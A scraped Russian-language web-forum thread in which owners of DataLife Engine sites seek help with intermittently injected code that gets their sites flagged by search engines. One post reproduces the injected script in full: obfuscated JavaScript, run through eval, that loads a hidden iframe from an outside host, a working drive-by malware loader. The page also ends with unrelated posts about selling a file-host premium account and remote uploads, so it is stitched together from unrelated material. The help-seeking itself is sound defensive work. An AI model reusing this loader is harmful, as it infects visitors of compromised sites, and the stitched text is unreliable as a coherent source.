Rocki

Сайт постоянно обновляется, тексты после машинного перевода немного дорабатываются, приводятся в нормально читаемый текст.

Да нашел это в файле engine\classes\js\bbcodes.js но проверил и этот файл такой же, как исходный с чистого движка файл. Только интересно зачем этот код переодически появляется в коде страниц, похоже это из-за него яндекс пишет на мой сайт в поиске, что "Сайт может угрожать безопасности вашего компьютера".

У тебя внизу кода страницы перед /body код, я у себя такой же видел, но он исчезает, он не постоянно вылезает:

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,String.fromCharCode)');var god=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var um=r.cssRules||r.rules;for(var mr=0;mr<um.length;mr++){var xld=um.item?um.item(mr):um[mr];if(!xld.selectorText.match(/#va/))continue;nfiv=(xld.cssText)?xld.cssText:xld.style.cssText;god=nfiv.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];ey=xld.selectorText.substr(1);};}catch(e){};}

ff=new Date(2010,11,3,2,21,4);t=ff.getSeconds();var hee=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,460/t,436/t,388/t,456/t,464/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,460/t,436/t,388/t,456/t,464/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var lj="";var g=function(){return this;}();eysa=g["e"+ey+"l"];var ippk='';wy=eysa(god);for(var i=0;i<hee.length;i++){el=eysa(hee);ippk+=wy(el);}

eysa(ippk);</script> 

Удивился - еще пару минут этот скрипт я копировал, а теперь его нет в коде страницы, и у меня такая же фигня!

Подскажите кто-нибудь, в каком файле на dle может сидеть эта зараза?

Да нашел это в файле engine\classes\js\bbcodes.js но проверил и этот файл такой же, как исходный с чистого движка файл. Только интересно зачем этот код переодически появляется в коде страниц.

Теперь в коде страницы похоже остался "след" стороннего скрипта. В самом верху страницы остался код:

<!-- http://www.getdle.ru code start now! -->

<!-- http://www.getdle.ru code end now! -->

Еще днем его не было. До обновления движка этот код также был, хотя раньше никогда не было. Еще до обновления движка, скачивал полностью сайт на комп и пытался найти название этого домена - но безрезультатно.

Файл у меня называется dbconfig.php, ничего там подозрительного не вижу, заканчивается этим:

$db = new db;

?>

Здравствуйте! У меня похоже такая же проблема.

Буду рад, если Вам удасться помочь мне с моим сайтом music-create.ru. Проблема такая: примерно дней 20 назад, я обнаружил, что мой сайт Гугл выводит в поиске с приставкой «Этот сайт может угрожать безопасности вашего компьютера». Зайдя в панель управления, пересмотрев файлы в корне сайта мне ничего опасного найти не удалось. А в коде странице сверху был виден JavaScript со ссылкой на чужой сайт, в google.com/webmasters также указывали на этот код. Мне пришлось восстановить бэкап сайта, код исчез, гугл доволен. Я сразу изменил пароли к сайту и ftp.

Но через несколько дней уже Яндекс вывел информацию «Этот сайт может угрожать безопасности вашего компьютера», но что интересно, стороннего кода в странице не обнаружил, запросил перепроверить в webmaster.yandex.ru, на следующий день сайт стал нормально отображаться в поиске.

Но так повторялось уже несколько раз через 2-3 дня, при этом кода не нахожу. Делаю запрос на перепроверку - сайт через 1-2 дня в поиске, потом опять - «Этот сайт может угрожать безопасности вашего компьютера».

Сам думаю, что может какой-то код внедрен и он "работает" не постоянно, а то включается, то нет. Но найти его не получается.

До этого стоял движок DLE 8.3, 6 дней назад обновил до 9.2 (лицензия).

А Сегодня вот опять к концу дня Яндекс выводит эту надпись.

Если кто сможет, то помогите пожалуйста!

Да, на всех файлах стоит - удаление сегодня) Надеюсь это не случится...

У меня премиум аккаунт сроком до 9 September 2011, но он мне не нужен. Может кто-нибудь купит всего за 25$ отдам через вебмани?

Кстати на счету $26.04.

Как я понимаю удаленная загрузка пока не работает?

А не могли бы вы настроить, чтобы загружались ссылки по-удаленной загрузке с hotfiles.com через премиум. Пробовал - не получается. На сервисе _unextupload_ загрузка осуществляется, т.е. это реально. Знаю, что с hotfiles очень проблематично скачивать по удаленке и в своих аккаунтах на разных ФО не загружается. Если реализуете, то вообще здорово будет.